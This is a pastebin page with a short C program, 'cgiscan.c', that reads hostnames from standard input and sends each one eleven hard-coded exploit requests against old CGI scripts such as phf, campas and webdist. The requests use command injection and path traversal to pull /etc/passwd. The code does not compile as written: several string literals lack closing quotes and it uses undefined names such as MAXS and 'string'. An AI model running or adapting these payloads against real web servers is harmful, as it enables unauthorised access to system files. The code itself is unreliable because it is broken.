C   84

Cgiscan

Guest on 25th April 2022 10:23:37 PM

  1. /* cgiscan.c is a simple cgi scanner. Improve it if you can! */
  2. /* Coded by sHaDy */
  3. /* Compile with gcc: cc cgiscan.c -o cgiscan */
  4. /* It work on Linux */
  5.  
  6. /*Include standards*/
  7. #include <sys/syslog.h>
  8. #include <sys/param.h>
  9. #include <sys/times.h>            
  10. #include <sys/time.h>                          
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <sys/signal.h>
  14. #include <arpa/inet.h>
  15. #include <netdb.h>
  16. #include <sys/stat.h>
  17. #include <sys/types.h>
  18. #include <termios.h>                  
  19. #include <stdio.h>
  20. #include <string.h>
  21. #include <fcntl.h>
  22.  
  23.  
  24. #define MAX 11
  25.  
  26.                             /*Define the cgi strings*/
  27. #       define CGI_01 "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd\n
  28. #       define CGI_02 "GET /cgi-bin/htmlscript?../../../../etc/passwd\n
  29. #       define CGI_03 "GET /cgi-bin/test-cgi?*\n
  30. #       define CGI_04 "GET /cgi-bin/view-source?../../../../etc/passwd\n"
  31. #       define CGI_05 "GET /cgi-bin/pfdisplay.cgi?/../../../../etc/passwd\n"
  32. #       define CGI_06 "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a\n"
  33. #       define CGI_07 "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd\n"
  34. #       define CGI_08 "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd\n"
  35. #       define CGI_09 "GET /cgi-bin/pfdisplay.cgi?/../../../../etc/passwd\n"
  36. #       define CGI_10 "GET /cgi-bin/nph-test-cgi?*\n
  37. #       define CGI_11 "GET /cgi-bin/php.cgi?/etc/passwd\n
  38.  
  39. main (int argc, char *argv[])
  40. {
  41.   struct sockaddr_in sin;
  42.  
  43.         /* int outsocket, serv_len, len,c,outfd; */
  44.         /* struct hostent *nametocheck; */
  45.         /* struct in_addr outgoing; */
  46.  
  47.         struct hostent *hp;
  48.         char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  49.         int sock, i=0, X;
  50.         char  *stringhe[MAX];
  51.         for(i=0;i<MAXS;i++) {
  52.         stringhe[i]=(char *) malloc(sizeof(char)*100);
  53.       }
  54.                 string[0]=CGI_01;
  55.                 string[1]=CGI_02;
  56.                 string[2]=CGI_03;
  57.                 string[3]=CGI_04;
  58.                 string[4]=CGI_05;
  59.                 string[5]=CGI_06;
  60.                 string[6]=CGI_07;
  61.                 string[7]=CGI_08;
  62.                 string[8]=CGI_09;
  63.                 string[9]=CGI_10;
  64.                 string[10]=CGI_11;
  65.        
  66.   while(fgets(hosta,100,stdin))
  67.     {
  68.         if(hosta[0] == '\0')
  69.                 break;
  70.         hosta[strlen(hosta) -1] = '\0';
  71.         write(1,hosta,strlen(hosta)*sizeof(char));
  72.                 write(1,"\n",sizeof(char));
  73.        
  74.                 hp = gethostbyname (hosta);
  75.                 for(i=0;i<MAX;i++) {
  76.                 bzero((char*) &sin, sizeof(sin));
  77.                 bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  78.                 sin.sin_family = hp->h_addrtype;
  79.                 sin.sin_port = htons(80);
  80.                 sock = socket(AF_INET, SOCK_STREAM, 0);
  81.                 X=connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  82.                 write(sock,stringhe[i],strlen(stringhe[i])*sizeof(char));  
  83.                 while((X=read(sock,FileBuf,8096))!=0)
  84.                 write(1,FileBuf,X);
  85.    
  86.    }
  87.  
  88.  }
  89. }

Raw Paste


Login or Register to edit or fork this paste. It's free.